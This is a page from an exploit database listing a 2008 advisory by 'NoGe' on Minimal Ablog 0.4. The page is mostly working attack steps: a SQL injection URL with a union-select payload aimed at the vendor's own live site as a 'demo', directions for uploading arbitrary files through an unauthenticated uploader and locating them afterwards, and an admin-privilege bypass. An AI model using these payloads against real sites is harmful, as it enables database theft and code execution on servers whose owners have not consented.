[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Minimal Ablog 0.4 (SQL/FU/Bypass) Multiple Remote Vulnerabilities

Author
NoGe
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-4325
Category
web applications
Date add
30-11-2008
Platform
unsorted
=================================================================
Minimal Ablog 0.4 (SQL/FU/Bypass) Multiple Remote Vulnerabilities
=================================================================


===========================================================================================================


  [o] minimal-ablog 0.4 SQL Injection, File Upload and Admin Bypass Vuln 

       Software : minimal-ablog version 0.4
       Vendor   : http://www.abweb.co.cc/
       Download : http://code.google.com/p/minimal-ablog/downloads/list
       Author   : NoGe


===========================================================================================================


  [o] Vulnerable file

       index.php
       admin/uploader.php



  [o] Exploit

       [ SQL Injection ]

	    http://localhost/[path]/index.php?id=[SQL]
	    http://www.abweb.co.cc/index.php?id=-3%20union%20select%201,version(),3,4,5,6,7,8--  <=- demo

       [ File Upload ]

	    http://localhost/[path]/admin/uploader.php  <=- upload your file here
	    http://localhost/[path]/img/[your_file]  <=- file will be uploaded here

       [ Admin Bypass ]

	    when you open admin/uploader.php to upload file you already have admin privs too :)


===========================================================================================================




#  0day.today [2024-12-26]  #